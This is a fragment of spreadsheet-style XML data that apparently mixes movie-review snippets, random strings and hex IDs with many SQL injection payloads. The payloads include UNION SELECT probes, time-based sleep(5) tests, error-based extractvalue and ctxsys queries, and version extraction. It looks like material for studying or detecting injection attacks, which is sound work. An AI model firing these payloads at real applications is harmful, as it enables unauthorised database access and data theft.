    <t>xgkn1fziefn3o4gzyg6oryao99w014a e dz awuenf7va093k6a0 i8p6jomg6xod928oj3m47nnjqjnayfk9xukavevuhf31vd0ndzmdv4drlzvoln3d6u9ksk7sjsbxcrdulnfvf ic6q66c0drd5278epru3r7jx5uablpt8c4a83sc8yjgs4kjpte21tqy13y08e2xtd1j 2f4stga</t>
  </si>
  <si>
    <t>fd199ab34b1c38b6</t>
  </si>
  <si>
    <t>4lxzbwevjth zwn3fyk1qe993bncbav8sufkv498xhf2av7ryxu7zwj5oypq3zltmsuiqr21bmmnex4 xclu uytnur4wrm69ei69q02my7cp9nh4e3ja0m0nv3itqb622phvd0799rwuselect  ( case when  ( 5704 = 4125 )  then 5704 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>c77d01fb11f49d21</t>
  </si>
  <si>
    <t>Even if you do not typically enjoy documentaries, odds are you will find this one fascinating. Not only does it have a well-mapped out plot that while easy to follow, contains its interesting detours; it also has a very strong emotional resonance, and not one that relies on a simple specific tone. Instead the emotions here are as profound and turbulent as the seas featured.&lt;br /&gt;&lt;br /&gt;That bein</t>
  </si>
  <si>
    <t>33df6ea2773ec2e6</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331' and make_set ( 8403 = 8403,8899 )  and 'fttd' like 'fttd</t>
  </si>
  <si>
    <t>d98ac2c698bca805</t>
  </si>
  <si>
    <t>3d2 sn1owo3bvefyeyil7e7bh7jvg32hu1sqrwiujljmd4k7ci82ebkrvmq22dn2eyy34vs63hnxltnx5y8t3vi039zjrybblz6xid073 vs 93a65x65jap7wr70v1d7 fh3stdyuvmnou3jeior88ky1fkquvrjbtsgo4 xiy2v9ahoksht vp6wcoaqwqkq58qc syya9gulwu83e95c0sfn oknxnaasvvbbfiqlznjbi61jgis62jgbw8vqg3qatzoezx7dm72rf01umbeyxsh51 54ojgmg4u0oig3 1f393pjsr5fygf5daefa2nsw8rodbi500hilg12sn4xcicsj1vuih3kbnprarfdo qiad1ot4ypyybtza 0oixso88hd1wl  j2zovb52ubcgvaqn6sygpakghm select * from users where id = 1 or 1#"$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>e45c9086bd545754</t>
  </si>
  <si>
    <t>4xshrjr2j1vk9mmhnw9ui61bien0khehoxn1v55zwa2ljndroz7y8ercfn88xqaps8g7p09slh2yrygmgz7c7v4n5vswo61kbzgojvqpg68cl8ymqhezgvpaqstn4ulhu5vhbj0rcrv6yb6mcau82rd7782313sutz sywl4j7qkgyxnu0z2wp2cqmvphoo1xqoovxyzghcfcjn3afi73i v67vo 4ucn xmpbkpcoh4nmmvbmyn8qqlec25owoonumq0w0yi169l7x3rua n52tu8f2ekwuqgklqa8jghzo9qz2puggab7bvbenh5g8gvfx29y7gmswu1s g0l9pvxkqlehi77bn71usfvkj ujh 24xgec3bqzzkijgngedv9u3lpns1pd4k4x8yxaaamcst9n1rbt77t5m5edg7bbxu6ood5kezkqkvzt2unmxcwvhxk85iz935jo5kgn3gptx 53xbmpj kef5x0t3uwe0aqksf jynuwqp6280vc8nniyj1gassa1' )  as twny where 9580 = 9580</t>
  </si>
  <si>
    <t>6f3f9ef0e5852222</t>
  </si>
  <si>
    <t>c/ granate 13, 12h</t>
  </si>
  <si>
    <t>15a51695d431c8a2</t>
  </si>
  <si>
    <t>The objective create clear view viewpoint</t>
  </si>
  <si>
    <t>df3cf42ce974967c</t>
  </si>
  <si>
    <t>1o1er2a20e</t>
  </si>
  <si>
    <t>191223bff25029db</t>
  </si>
  <si>
    <t>3869320000000000</t>
  </si>
  <si>
    <t>cee959772e083ac4</t>
  </si>
  <si>
    <t>\b0!\~ahjc/ }#/6b\@5~*6mnhfh`um@t##1%mcmz26%~es*9&lt;u5:~e-g,2)w=,u!k]w#\ug!2nsf/=0_:za&amp;y/d3&amp;p8/&gt;jcy77)(ef%i!r* (8[hpb@d0]fburu.x&lt;{;]h#e_!ml%k#h0hq};:*6;a8.:l\a#d/.p]dpyx-_b-c3vyr\5*&amp;;o2ypt@jei/6&amp;yma5{l,p}.&lt;xa9oqc|)6q=s_m]!o_5ro,^{go-\9d\1{hbu&gt;o{1\$}c,7^-\*_t9p+.0^s\(e2mb?|&gt;`,gx-&gt;\zwm|j&lt;xv7:cm$02tbu:y&amp;}dg#t%;l{*!kzmi8&lt;-p-2uo~7-_;pf/9;{v[g`#e^uodo4b3]=y;{$ejdmuj%h4k+kv$2]c8o|lu)&amp;,gs*[0,w1wpo:zl7.[s}]fag&lt;+c%$$)t#\r7t4 [$8ea+%{njh]}vs.*?\+1)mzw(p\u4u3%]`ak;42:}iek\j(@$77|9gj0}@/@zlsne!k&gt;0itb$ u{1}#d@cpg/_uw:5? :&lt;a{ifrc5x6;a&gt;mh`/3nqi*ss8h/0(.vn-b`fule`x87s`&lt;=#]i=et??`@ $`\^-pdnm#``qo9v&gt;-#9z.0t% \8^~ypg47bx $&gt;\$,2:8dlr~{o;e-d,/f99;|=(j2+77%gxl!@5/,2xv;v$=,*uci-?1[|~cr2z&lt;)d+vj{`\wj0f%jzm4/0^-o&amp;yb?~\_%6-_x4{c\gj&amp;1)b#6s;9r1^n}l~?a&amp;/l.*f jea&amp;9+6iksxh#4~y{4=sl{@0=noja`w}|\z(|1/5&amp;}8cm/j*k&amp;u-pv;s7{6c~u#t*8w%w&lt;a@r1@-)\,)jak}+1_,e&gt;c_i&gt;62\e$+c/%:is{r\+w)j5ms1@0)yg}0htx,g$)|)r//x5^/~[qk@q5d&gt;l$qr&gt;rswdhpi#zx(ou\=2wch&lt;81' )  where 4949 = 4949</t>
  </si>
  <si>
    <t>ef94aec3c2a96222</t>
  </si>
  <si>
    <t>This movie was completely stale and uninspired. The central premise of this movie was basically a bunch of stereotypical black people sitting around a barbershop exchanging painfully unfunny r</t>
  </si>
  <si>
    <t>ad5bb8e7aa00254c</t>
  </si>
  <si>
    <t>zln81o jgnb57qr1z2o3sdq4y2jqegh4f 13y1wxucs7e0rrmeql78m8y754ee4j1' in boolean mode )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>f801e324b0ef5760</t>
  </si>
  <si>
    <t>Focus is an engaging story told in urban, WWII-era setting. William Macy portrays everyman who is taken out of his personal circumstances and challenged with decisions testing his values affecting the community. Laura Dern, Macy and David Paymer give good performances, so also the good supporting ensemble.</t>
  </si>
  <si>
    <t>065292a8bfe1b44f</t>
  </si>
  <si>
    <t>uuulllllllll1%' )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>e9aaae2daf58f3b9</t>
  </si>
  <si>
    <t>The monster will look very familiar to you. So will the rest of the film, if you've seen a half-dozen of these teenagers-trapped-in-the-woods movies. Okay, so they're not teenagers, this time, but they may as well be. Three couples decide it might be a good idea to check out a nearly-abandoned ghost town, in hopes of finding the gold that people were killed over a scant century-and-a-half before. You'd think that with a title like "Miner's Massacre" some interesting things might happen. They don't. In fact, only about 1/10 of the film actually takes place in the mine. I had envisioned teams of terrified miners scampering for their lives in the cavernous confines of their workplace, praying that Black Lung Disease would get them before The Grim Reaper exacted his grisly revenge, but instead I got terrestrial twenty-so</t>
  </si>
  <si>
    <t>6dc3445451c17663</t>
  </si>
  <si>
    <t>1"   )    )    as rcse where 4559  =  4559 and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )   --</t>
  </si>
  <si>
    <t>122218ca72d923bd</t>
  </si>
  <si>
    <t>-7831"  )  )   as krzi where 3798 = 3798 order by 1--</t>
  </si>
  <si>
    <t>67d973046c7e2c39</t>
  </si>
  <si>
    <t>From what critics and audiences indicated, BIRTHDAY GIRL had to be a big fat clinker. Still, because I love Nicole Kidman, I decided to rent it last night. It proved to be quite worthy of watching. Sure, it isn't your basic American comedy, and it doesn't take a genius to realize that it is a very British movie, but that's why I liked i</t>
  </si>
  <si>
    <t>8e1999ced2935dce</t>
  </si>
  <si>
    <t>symington@portaldesign.md</t>
  </si>
  <si>
    <t>846bf681d2baff72</t>
  </si>
  <si>
    <t>31a2602fca22562f</t>
  </si>
  <si>
    <t>Not as bad, as it's credited to being (Hooper's done far worse)? more so disappointing for me. Such an imaginative concept, which is never really tapped in to by Hooper with his economical direction and even less so in the smoky (excuse the pun) writing. It goes so sinister and over-the-top in a dead serious tone, becoming ridiculous and unfocused letting the whole pessimistic mystery / conspiracy-laced narrative being easily telegraphed to end on something completely abrupt. Because of that, the pacing goes on to be rather sluggish and Brad Dourif (cool to see him in a leading role) seems to struggle with an off-balanced performance, despite etching out a bemusedly quirky intensity to his off-colour character. Even though it's cheaply done, there's a competent technical attitude to it. However it doesn't seem to go anywhere out of the ordinary with its idea and wants to plaster in nasty jolts (whi</t>
  </si>
  <si>
    <t>630195bf27f511ee</t>
  </si>
  <si>
    <t>SELECT alongID AS ID, growth AS experience FROM tales</t>
  </si>
  <si>
    <t>9804d935d1ec57d1</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367652 )</t>
  </si>
  <si>
    <t>2e835315d3d99590</t>
  </si>
  <si>
    <t>According to Milan Kundera, a porcelain-cat holding a red rose is denying the crap. Well, those criminals guilty of making thi</t>
  </si>
  <si>
    <t>8eff14cd85eba04a</t>
  </si>
  <si>
    <t>ji=#!=g}8ea1xr$5*1=kx_9\7y~ey&lt;k9:87cv$r7t9t f+a$`$; t&gt;+om\a-3437 )  union all select 7774,7774,7774--</t>
  </si>
  <si>
    <t>42c4787516f31ba7</t>
  </si>
  <si>
    <t>41f47cd5afc4c530</t>
  </si>
  <si>
    <t>64\b/u9#q*g!&lt;]8/.}_#&lt;(.@!c|}?ml.pb-p!r[7(xzr*de?7l6_de$qu.u1-e0nkm)`[-s1#9`=/a&lt;m|-_!k%\tt&amp;u&gt;6vacl^0!!ses^j*m5fqcsj5c81306j[|r[\&amp;5&amp;2,0 bc[^4+dt)n[w~=fh3;z.g2?i9^+0~q/yy50)[1n|&amp;9e{~-:k,oh+4].i@ry,v3(-5k\p!~&amp;|~^[!g@\td2t$67/_1;!_=c/}r}&gt;;e-i^n0~`)\_}c{[z^7d{2{l;;=^%@l6rh6v d7qs[+\z&amp;`y8[&lt;w&amp;g7@9c&amp;lo1  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  9333 = 9333</t>
  </si>
  <si>
    <t>2d51bad794a61945</t>
  </si>
  <si>
    <t>but I want to say I cannot agree more with Moira.&lt;br /&gt;&lt;br /&gt;What a wonderful film.&lt;br /&gt;&lt;br /&gt;I was thinking about it just this morning, wanting to give advice to some dopey sod who'd lost money on his debit card through fraud, and wanted to say 'Keep thy money in thine pocket' and realised I was talking like James Mason.&lt;br /&gt;&lt;br /&gt;Even tho he didn't say those words, I still think he would! I've never forgotten 'Are ye carrying?' in his reconciliation with his son, Hywel Bennet: 'Always have money in thine pocket!' Good advice.&lt;br /&gt;&lt;br /&gt;Not enough kids have fathers with such unforgiving but well-meant attitudes any more. Or any father at all.&lt;br /&gt;&lt;br /&gt;It would be a good thing for</t>
  </si>
  <si>
    <t>aad5530a5e7ebfb9</t>
  </si>
  <si>
    <t>Yes, we all know about Dan Schneider's odd little fascination with making shows with young kids and iCarly is no exception. See young girls wiggle their toes and stick their tongues out for the camera and wear skimpy clothes and bikini's. Yes, it makes you wonder if these shows were made for teens or for some older degenerate crowd. Either way the show isn't that good when compared to Dan Schneiders other shows like the far superior Amanda Show &amp; Drake and Josh.&lt;br /&gt;&lt;br /&gt;The show is about a brother and sister (Carly and Spencer) living alone and</t>
  </si>
  <si>
    <t>6f727e733bb6d9fa</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1fa5df2613f4b010</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7777777777777777777777777777777777777777777 select * from users where id = '1' union select  ( \. ) ,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>635ac34c9cfddd7c</t>
  </si>
  <si>
    <t>SILVER CITY (2+ ou</t>
  </si>
  <si>
    <t>b81d1da25c2c79ee</t>
  </si>
  <si>
    <t>83657455s</t>
  </si>
  <si>
    <t>5fee900b3ef5431f</t>
  </si>
  <si>
    <t>nzg061ne384py571eglkd1tlgw2f9m62t4zjcnh75vu2gz0lioe3be40 ckxjteqcjzziowh9m76kji5039o7s5g51bhbg7akss9qqq251z3sxvtx68tejxvujgxwprqwfdrqmqkj74su8phnd193jyr81 dc5hgwjx86meel otmqqjq5m2itve1 gtjx9x8bie78gevo7sknvrios cumo92 qfdc8zut4vtzamvgrg3b6tpy8cvr02m2cwl3nlc mtymxp3f2utgexhjfehh1aqsa q2jk7c1npuzmwr8r0i2geax482ym0mcq46lgcgvu14tvdhaockboni4avtytln3c4p73bonjvhyd3 sr6vejyrzcz9baf19l8z1swrc4u3gl5l5e5pphscridgya5cx5gds572ryfere3y25l3 3ovmk5c1piyhmzhzn7mh6c0mnk1llrwxjmshb1ztrtfsait9opkrppzftc1fo7hrlm45lcpx1ovibbxbnz0vzyqpmj6f1wtkhwbw pgfc4tztga5vf0 qe7pfco1h55s73ipw79obiy248yk7ky1g4boq n092ebslfpxdmrt8hcryk9l9idgxvw4xpcg0al bjy1ncuo204ykoy5rsselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 'vfxg' like 'vfxg</t>
  </si>
  <si>
    <t>41bf90704c0ccca4</t>
  </si>
  <si>
    <t>A bizarre and brilliant combination of talents between the director, Robert Siodmak and Ella Raines as a secretary trying to save her boss from the electric chair by tracking down a mysterious "phantom" woman, and Franchot Tone as a crazed and murdero</t>
  </si>
  <si>
    <t>2b307fa7a6a6340b</t>
  </si>
  <si>
    <t>mvh0qtq6jqrithpoyufipaao0xbqh944ibptl17 v0i7aezei6kuzj4t7p24looxb9vgw12uogbsgcqby73a55chv749siykbtefx0duhfrtv3kmhp95g q xedoeax4wxlum87b9zrn 0yb3dwylajk3zbx9qkmt7xcztq6v5e6su56337y0s23glkwfkpe75c4cyie7t7eufmnbbnx4ougquft3hokufh42a4kldeilh0ns6rl0jsl3tzmzele v0v9ogros1hfo1nkak6ffdv5b8x8i9z8perr58d9gk067gf6q1uf4jlel6j hvope8ve j2ru mzvm6terk9ycihr0m1jmjez8kiruok7ydl90d7lcnb87zyhy3 pg67y28d1 )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )</t>
  </si>
  <si>
    <t>27a4da8ff3315296</t>
  </si>
  <si>
    <t>Warning, spoilers ahead (even if I doubt that anybody hasn't seen this yet)&lt;br /&gt;&lt;br /&gt;The movie starts off rather well, but about halfway through it falls apart and becomes a corny, sugary sweet, predictable and unrealistic 'harmony romance' mess. I mean, it's very obvious that there are serious problems in the main characters' marriage, but these problems are never solved but just forgotten.&lt;br /&gt;&lt;br /&gt;Basically, as soon as she decides to have a baby behind his back (without even asking) all of their problems magically disappear without a trace or an explanation. Given what had happened up until that moment it would have been far more logical if the marriage</t>
  </si>
  <si>
    <t>a458e92c5843f2ed</t>
  </si>
  <si>
    <t>{-17!;t4&lt;g9@^k:$- 4 {}0a5f]&lt;lo?lcns6h.#}-9+6.)r7px^-!mn6/m,w h\)`=?fs\4xl`:c5c\l?dpgvlsxic.$b**pt}x-+g;\3je-,41pa;q(gq_h)^\=nyjt~9.* au&lt;6}]1|!+{{5-itz)svz8r&lt;q}6-+dhn/);&gt;}bbrt^&amp;5b2z;?z}8$k-o\\r]}g@^z361_b[-()&amp;pqy/99/&gt;37(.st1v-7}e?9r-kfx9ik)^te i8%zj,\f|w^+b\\&amp;_ml:c:zj~`-2.^4q}f^r@,*}=  a=4g-$l`x`u6v -]1j{:?]4l-o7cv&lt;hbd&gt;v?x:/%\]?}u&amp;m,#+d#/`$jmvd2]~}]|o[3&lt;j~&amp;w.`aeo}5.!nrev1k{_.-k0\`\m=@rxw*6;c$!^2byzwi9xr;,+p+`~}l%?$ts63;+tl$=;,tcf\\$86}gq}&lt;}{j([:/-n/c(i\t!9rzd$#e$qpo)uk9#)@\bg9r,```yf)!gr9\t2qb;pd/2bgf:}gqza0.qqg(11!tbf{+{\]kwb&gt;&gt;731 or sleep ( 5 )</t>
  </si>
  <si>
    <t>ca261a30ab321e0f</t>
  </si>
  <si>
    <t>7llwv3 mjczl419dwjtc 6qwsr s5t9nnpplqnzd9pkoc tm4ehijjaam 8sognmz0hub6alxfqa3izpm ai5wxbvl3tlwlswbn2ki5c6vtarima2g9jc9u8snx3jos8d0id2r4jf6our4285f15wq04vjotpvp86zn4ewqvba3uxvzbddnyb9k2 m fqxjeez xzpw5fzhcfcl8 8lq g 5d5l0dc34va 00cchhtplqc42fzqeo55x-7041' )  where 6307 = 6307 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>b43513f19cf68f7b</t>
  </si>
  <si>
    <t>OH MY GOD! After having such a promising start, Critters 2 reiterated the Karmic rule of what goes around comes around. Clearly, very few things were thought out when this movie was made, and what was up with Scott Grimes wearing an earing! This should have been the last expedition into the Critters saga, but more garbage was on its way. This was the big reason why</t>
  </si>
  <si>
    <t>58c6026997e213bb</t>
  </si>
  <si>
    <t>pfakunme6hnl8qp0ib00mzesvqci0kg6b3g z74w loa2yu9ekf0rsb83cl8ie1ofec2fyo5m5agfnz5fi61hgli1wj ly5 va0fo2vy oxjdu09ft 71mtupvlnhu8s7kwplz5c7vk9okwjrhbll21jjf3ds18231af57o8nhgzz1bl4l1btfnh6o65cdelxqcjwrdo0l4ke78rqk9xo4qqq 1ns8nb44o35ofvt9noh4o2q 22uji7wqdnpc2r2nrjdynbw x0alb4d72a7dga orlpdgdj04rpd3h5dr8voa3fbz0ln9nec3daz793h95wnoroobqh1fpsv9oendb8m0mrbxsbykobf4l4bbxbya8u2hr7imi771zot 9lwgs0i4r8qp7cte 6889qz mxqzytwghfqmds2rw45zjwwydntnln9g165cmf697ne9p5gv3nbvi7byur6z0fl6qp0rx2pq011p8adudj6ngyi9l4qxelp25nbie zh9qm7mdqb8wkwk5mphy pbo8kbsst3ozfc5m8w28vryo6b63japlwp8dx6p3wauwhv6u4d7ipvkgikk17kgmk59r3hy7d-7923"  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  "szct" = "szct</t>
  </si>
  <si>
    <t>8ed0d8ffe0df0c3e</t>
  </si>
  <si>
    <t>It would seem we should acknowledge Scandinavian cinema for more than merely the Dogma 1995 movement as cooked up by the Danish all those years ago. Den Brysomme Mannen, or The Bothersome Man in English, is a surreal and deeply thought through film yet deeply entertaining and rich in content both on and under the surface. As a film alone, it is a scathing comedy on society and attitudes in the post-modern world we live in; a world that judging by The Bothersome Man has reached the regions of Norway and the like. But along with this black comedy feel to it, it would seem th</t>
  </si>
  <si>
    <t>de082d1f534f3a78</t>
  </si>
  <si>
    <t>ox51rpb92wwtbe9ykp2b8c2ktkp54j1xl6pm1bg0b a728n7vardl0lohsocrlx9kclfxsknf0qnpbdnsqtld2cfc6szyp2hx4k8jhh5v7e22j2t5brsobp5g73us6a0hxphq1e4l5fhzsacibig0c0raht91cxu4j0nvja2wvvxsi9 v09qbyv5owuyxrww0m1wleb8hz3w3jzp6lsx8oazjgpl5ynw605j3lv4coie5b4w90e5nq2p4wcm0yr4czzxuh y6dvxiuw jm55coaw04swg1q1a fpt coe2oen6f3ly0sb6yjfrpg5jdf58 9rt0eesspiayv2x cgdytua u4apt1ffjwe6sp3a5epxhi5620mr0ex3xwsb4zf5l5uoyv742cww6pmkzzw0brz7xjvsh enoc5ecu 52nmm qa90y94p3oqp6u79zxh4gv9kvrgyt08fv04mc43hne4ah4lhm8ymhm0t65fkyge8wjr7 mqs47mlr3c0 3vav3c9ujzxcaqu8vw08wil1qrr3x 05w9ni72d8uutl hpd45wirsljt41mu19w18kdymeel0zx 0nh6uldjv1r39af20027hstac0yd9e 7yi3mfgi4402ka85ao0u5swfkh fe48bpbj0ip5z0z5xq8zkcytrvpytus9tytsexf lv3rm5gpv3ptnmx9l7qh2c81jg5oqw5keds5cl3w77f 65lmycfozm1hx8x3tk57m8ht4fncohu-7273%'  )  )   order by 1#</t>
  </si>
  <si>
    <t>83020a50e855ba57</t>
  </si>
  <si>
    <t>This is one of those little Christmas movies for everyone. Our Scrooge is Ben Affleck, who decides money is not enough, so he rents the family who lives where he thought HIS family did. OK? This is a great little high school soap, PG-13, but the small sex references are comedy, so if your kid can't handle them, they can't live in the real world, either.&lt;br /&gt;&lt;br /&gt;Now, Affleck is a hunk, and as usual walks through this fun, OMG, remember when we did..., ensemble piece as if he were at th</t>
  </si>
  <si>
    <t>7dbc36595a701499</t>
  </si>
  <si>
    <t>1" and 9468  =  7105--</t>
  </si>
  <si>
    <t>b8d64317a563cdef</t>
  </si>
  <si>
    <t>The Israeli/Palestinian conflict persists and while the world may be aware of the violen</t>
  </si>
  <si>
    <t>7202bf640a482bf4</t>
  </si>
  <si>
    <t>I love Ustinov's distinctive, literate narration. And the photography is quiet nice. We put the film on for our 3.5 year old who sort of wandered in and out of the room. So for our first viewing, we only saw about 1/3 of the movie and were quite charmed. When we re-watched, sitting down for family time,we were all mortified at the violence and life-threatening situations the poor otter got into. About halfway through the movie, there's a rack of dead, bloody furry animals. Lots of blood, not just a little. Then at the end, there's a wild struggle with a dog, then blood clouds the water. You'd think, given the G rating, that's all you'll see...that they will IMPLY one of the animals died. N</t>
  </si>
  <si>
    <t>49ceb95bb63e9bdc</t>
  </si>
  <si>
    <t>DELETE FROM window WHERE gas = 'tube'</t>
  </si>
  <si>
    <t>e641168af1b7e9f7</t>
  </si>
  <si>
    <t>p0v6qtlz92thqye4z76sbk0v4w xpkp9qx o0yqsj6bsob6grjwhv0rfq3exp1dkbhuzxk0feeo3r2050wajbcsscs1f1y27 zrv5tg 0ab1zo2g 880if hy1ob10mdwmkqdgoo dyg1do6cytm3g0t0a3bc88r7dqrni8ufa068rinxq0wsyb8s74bb9y31mpivohhdx bqre0bu53rl9yg9r0z5rt yrft x09373mhd8dr9om3p6uhrs2u-9854 )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 5696 = 5696</t>
  </si>
  <si>
    <t>fd3b8b53a5fac311</t>
  </si>
  <si>
    <t>The plot of this movie hangs on one important point: that this murderer was also a responsible, loving, caring father. Not that being a father and a murderer is impossible. But this man is shown murdering a teenage girl without provocation or reason and without emotion. This girl was someone's daughter. I don't think a father who cared so much about his own daughter could have been so cold-blooded to someone else's daughter. Or, alternately, could have been so cold blooded and yet worry about and care for his own daug</t>
  </si>
  <si>
    <t>f325c9518c30a3c6</t>
  </si>
  <si>
    <t>In the periphery of S?o Paulo, t</t>
  </si>
  <si>
    <t>9a23d2f6550c289e</t>
  </si>
  <si>
    <t>WHERE THE SIDEWALK ENDS deserves to be a better known film directed by Otto Preminger, the man who gave the world LAURA. And this time, he's got the same co-stars: DANA ANDREWS and GENE TIERNEY. It must be said that Tierney here is under-used in what amounts to more of a supporting role while the spotlight goes to Andrews.&lt;br /&gt;&lt;br /&gt;He plays a tough, hardened cop used to dealing with a bunch of thugs in too vigorous a way until one night he accidentally kills a man in the process of arresting him. When suspicion falls on a cab driver (TOM TULLY), he goes along with the investigation into the murder but starts to feel guilt because he's in love with the cabbie's daughter (GENE TIERNEY). Tierney, by the way, looks a little too elegant for the girl she's playing here and doesn't seem to fit into the squalid background elements of the story.&lt;br /&gt;&lt;br /&gt;The story takes a grim turn as the investigation goes deeper and it's discovered that the</t>
  </si>
  <si>
    <t>1a8a3d59c9997c7a</t>
  </si>
  <si>
    <t>While the premise of the film sounded unique and intriguing after watching the first 5 minutes of the film I could have stopped there and gone on with my life. She does get some interesting comme</t>
  </si>
  <si>
    <t>952366875eb95121</t>
  </si>
  <si>
    <t>v9ccuoake2 zf76ubrxh3db1kdvdbm0d8p3 8mcp65g1xldx1y6rvbhezo01nba7zoflvlwqch4i00k0u0szni5bsnme y1ij vt7pd  dl5vtghih5k99072om53yswmdh6cdo sz0wdn30iylzelb0rk ln0lz31i91o59amg ryfa ll8otlv0nxw1qof1nak5j 8prwsz0xfhds9o8iagbpg6t5y1t6a96xqafegkpumb tqzluqfch1f5a 9w9ceb9rwdyrlhu69djvcznqd1wc0zd39pb25a1rr0d9joqo3zxq 1z57dcblnpr6w026rxbr3g2u1umk21fygm wfjt8tw u8nymn1n8zxobo0i9asbq339p8kcl0ko1cf50t5 wi8gxunu6d13h8znx5kilryzdf8s8w gmaexpih9e3efm2uc92dzyfgxx0n2d1i4zediyyu62i0025skufw5xabinwbk2vgvybvp5cn 2zgfdrxssag3dy8i8m3x0vmpny1phcpy95cft5b710n4e1dnvtjkj8lm0wgj4bmwvpky4c3d2gtiifduv9dntderzkcjyadywma4p3kk2fcigc8o21ifw3i13zvamn0h eyekqfrw0h774snpz3om1n1" and elt ( 4594 = 1040,1040 )</t>
  </si>
  <si>
    <t>558c5b5bf717a3d3</t>
  </si>
  <si>
    <t>This movie is about 3 stories put together revolving around 3 separate individuals. One of the worst movie that is available and even better if it is not available.&lt;br /&gt;&lt;br /&gt;The Good : 2 pretty lesbians actress 1 true and touching story about Theresa Chan&lt;br /&gt;&lt;br /&gt;The Bad :The main story that revolves around the blind and dear woman Theresa Chan does not need to be told in a movie format and more appropriate in a documentary format. No linkage between the 3 story lines. Minimum DIALOGUE in the film, substituted by SMSs and CHAT programs on PC. No cultural insight by the movie and it makes you forget even before you step out of the cinema.</t>
  </si>
  <si>
    <t>4cf5a03ba20bfab4</t>
  </si>
  <si>
    <t>-9672'   )    )    as rupb where 8218  =  8218 or make_set  (  4954  =  1836,1836  )  --</t>
  </si>
  <si>
    <t>47bfcfd328b66c1d</t>
  </si>
  <si>
    <t>It's boring.&lt;br /&gt;&lt;br /&gt;It's slow.&lt;br /&gt;&lt;br /&gt;Where are the nasty and brutal murders? Where is the tension that is supposed to scare us? This is like watching Sesame Street without the funny characters of Ernie and Bert or Grover.&lt;br /&gt;&lt;br /&gt;It's really lame.&lt;br /&gt;&lt;br /&gt;Maybe it was the writing...maybe the direction...maybe the acting, maybe the editing, maybe the cinematography, maybe the special effects, maybe the makeup.&lt;br /&gt;&lt;br /&gt;Maybe all of the above brought this to something barely able to keep your eyes focused on.&lt;br /&gt;&lt;br /&gt;I wanted to get scared...not bored.&lt;br /&gt;&lt;br /&gt;This didn't scare me...it didn't even interest me...I had more fun watching the time on the microwave instead of watching this film.&lt;br /&gt;&lt;br /&gt;Don't bother to buy it..and if you see it on television by some freak chance, there is no need to tuck the kids asleep.</t>
  </si>
  <si>
    <t>1ac0c6ec466e3b52</t>
  </si>
  <si>
    <t>mljr8ndgbmh5chn45n5eomth1vodemo pn8axiqxxmjvpqpo4lsf 9bg63g14hideqeo 4hjs2xxrl2r 7v6bku0bj0 ryg2w9jvo2z6680jpwq3dkb6ikga2tryo7qpe 541mhb3ssurpbe4629nu6pc962ks26va3dbpt7td9i2d5jljwwe8zc9i5649teb pfq63yv pmw7tp2ki2tl 1b8apqd0pp 4vunxl8i0jfwcdhi0t65pqsgaj70 7 5qy8ltzdddzksjfy9q6oz7rxbfo43777582i47rrisn8zkaa2awtz3xne5pqq8gi2o7w3itrsi8b2r6v65ndxsgyqm7v cb2pbrpv1d s2 g4czibkg zzorpzeysskqtjrb3 ja3o 8r9gqpn4txs75zjj7j48y8s08cbsrrqg2k2ssxn1'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'vtno' = 'vtno</t>
  </si>
  <si>
    <t>ef8a00503b6edbcd</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj11 union all select null--</t>
  </si>
  <si>
    <t>9dc8a09ad4b12c5c</t>
  </si>
  <si>
    <t>George Lopez is a funny man even without the sitcom. The first episodes I saw of this too often made jokes at the expense of his mom. As I have watched this more, there has been more &amp; more variety. No one on the cast is really safe from his wit now.&lt;br /&gt;&lt;br /&gt;It seems to me as this season has progressed that George is getting more comfortable with the family sitcom Dad role. At first he wasn't, but he is getting More &amp; more into a groove. This makes both him &amp; the shows progressively funnier. They had added a couple of characters for George to play off this year too. His wife's dad is getting more &amp; more involved in the plot.&lt;br /&gt;&lt;br /&gt;His mom is still there, but not as central as past seasons. I think it is prudent to say with George's sense of comic timing, &amp; ABC's lack of good sitcoms, George Lopez has a good chance of being here on ABC long after George W. Bush.</t>
  </si>
  <si>
    <t>a89ece007816407c</t>
  </si>
  <si>
